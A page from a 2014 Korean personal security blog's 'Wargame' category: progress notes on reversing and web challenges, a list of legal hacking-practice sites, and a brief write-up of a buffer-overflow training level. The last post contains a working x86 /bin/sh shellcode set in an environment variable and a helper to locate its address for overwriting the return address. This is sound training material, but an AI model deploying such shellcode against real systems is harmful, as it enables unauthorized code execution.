Be myself :: 'Wargame' 카테고리의 글 목록 (4 Page)

달력

42024  이전 다음

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30

'Wargame'에 해당되는 글 34건

  1. 2014.07.01 워게임 현황
  2. 2014.05.14 CodeEngn 베이직 올클
  3. 2014.05.05 워게임 사이트
  4. 2014.05.04 BOF원정대 level3

워게임 현황

Wargame 2014. 7. 1. 20:26

최근 3주간 reversing.kr 이것만해서 이룬 결과.. 윈도우 문제는 1개 남았는데 CRC fuck..! 진짜 안풀린다.

아래는 4월부터 심심할 때 짬짬히 푼 써니나타스.. 웹문제 3개 남았는데 Blind SQL injection부분인데 관련 기본지식이 거의 없어서.. 일단 skip ㅎㅎ !!

'Wargame' 카테고리의 다른 글

Fc3 dark_eyes  (0) 2014.08.22
Suninatas all clear  (3) 2014.07.25
CodeEngn 베이직 올클  (0) 2014.05.14
워게임 사이트  (0) 2014.05.05
BOF원정대 level3  (0) 2014.05.04
Posted by flack3r
|

CodeEngn 베이직 올클

Wargame 2014. 5. 14. 20:40

ㅋㅋㅋ..;; 삽질하느라 시간 가고 롤하느라 시간가고 친구가 불러서 놀고.. 3일동안한게 고작 CodeEngn basic all clear..내일부터 초심으로 돌아가서 다시 빡세개 공부해야겠다!

'Wargame' 카테고리의 다른 글

Fc3 dark_eyes  (0) 2014.08.22
Suninatas all clear  (3) 2014.07.25
워게임 현황  (0) 2014.07.01
워게임 사이트  (0) 2014.05.05
BOF원정대 level3  (0) 2014.05.04
Posted by flack3r
|

워게임 사이트

Wargame 2014. 5. 5. 14:15

침투테스트 가상환경을 샌드박스 형태로 제공하여, 온라인상에서 모의해킹을 해볼수 있는 사이트

https://hack.me/

   

OWASP에서 웹 취약점 테스트를 위해 제공하는 VM웨어용 가상이미지 파일 다운로드 및 프로젝트 페이지

http://sourceforge.net/projects/owaspbwa/files/

   

각종 리눅스용 VM이미지를 다운받을 수 있는 사이트

http://www.thoughtpolice.co.uk/

   

온라인상으로 프로그래밍언어를 실행하고 컴파일할 수 있는 사이트

http://compileonline.com/

   

취약한 웹 어플리케이션 소스를 제공하는 사이트

http://www.dvwa.co.uk/

   

온라인 모의해킹 사이트

http://hack-me.org/index.php?p=home

   

OWASP 취약점을 바탕으로한 취약점 테스팅 가상환경

http://sourceforge.net/projects/vicnum/

   

리눅스, 아파치, PHP, MySQL의 보안을 학습하기 위한 가상환경을 제공

http://sourceforge.net/projects/lampsecurity/

   

웹취약점 테스트를 하기 위해 제작된 가상이미지

http://sourceforge.net/projects/websecuritydojo/

   

다양한 환경에서 악의적인 코드를 분석할 수 있는 가상머신

http://bruteforce.gr/honeydrive

   

웹취약점 테스트 환경을 제공하는 사이트

https://www.pentesterlab.com/exercises

   

웹해킹 전문가가 만든 침투테스트를 위한 가상 이미지

https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/

   

다양한 모의 해킹를 실습하고 트레이닝할 수 있는 기능을 제공하는 툴

http://sourceforge.net/projects/null-gameover/

   

SQL 인젝션을 테스트하고 실험해 볼 수 있는 환경(소스)를 제공하는 사이트

https://github.com/Audi-1/sqli-labs

   

침투테스트 환경을 제공(DVL)

http://sourceforge.jp/projects/sfnet_virtualhacking/downloads/os/dvl/DVL_1.5_Infectious_Disease.iso/

   

모의해킹 연습 사이트 링크 모음

http://chogar.blog.me/80130034776

   

모의해킹 관련 정보를 제공하는 사이트 (아래 그림 출처)

http://www.amanhardikar.com/mindmaps/PracticewithURLs.html 

 

[출처] 모의해킹을 연습할 수 있는 환경을 제공하는 사이트|작성자 Exception

   

'Wargame' 카테고리의 다른 글

Fc3 dark_eyes  (0) 2014.08.22
Suninatas all clear  (3) 2014.07.25
워게임 현황  (0) 2014.07.01
CodeEngn 베이직 올클  (0) 2014.05.14
BOF원정대 level3  (0) 2014.05.04
Posted by flack3r
|

BOF원정대 level3

Wargame 2014. 5. 4. 01:57

1. goblin의 소스코드를 파악한다. 

소스코드를 보면 gets함수로 배열크기 16의 변수에 값을 입력하는 단순한 코드로 되어있다. 

2. gdb로 스택 구조를 파악한다.

밑의 사진을 보면 스택에 16크기가 할당되는 것을 볼 수 있다. 따라서 우리는 배열 변수(16)+ SFP(4) + RET(4)=24만큼의 공격 스크립트를 입력하면 된다.

 

 

3. 환경변수에 셸코드를 올린다. 

export SHELLCODE = $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

 

4. 환경변수의 주소값을 출력하는 코드를 작성한다.

 

#include<stdlib.h>

int main(int argc,char* argv[])

{

char* a = getenv(argv[1]);

a+= (strlen(argv[0]) - strlen(argv[2]))*2;

printf("SHELLCODE position is %p \n",a);

return 0;

}

 

그 후  환경 변수의 주소값을 이용해 공격 스크립트를 작성한다.


 

끝..!

 

 

 

'Wargame' 카테고리의 다른 글

Fc3 dark_eyes  (0) 2014.08.22
Suninatas all clear  (3) 2014.07.25
워게임 현황  (0) 2014.07.01
CodeEngn 베이직 올클  (0) 2014.05.14
워게임 사이트  (0) 2014.05.05
Posted by flack3r
|